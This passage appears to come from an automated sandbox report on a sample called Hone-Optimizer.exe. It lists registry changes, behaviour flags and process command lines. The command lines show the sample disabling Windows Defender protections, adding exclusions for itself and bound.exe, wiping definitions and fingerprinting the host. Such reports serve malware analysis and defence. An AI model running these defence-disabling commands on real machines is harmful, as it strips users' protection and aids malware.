| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07} | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" | N/A | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\mode.com
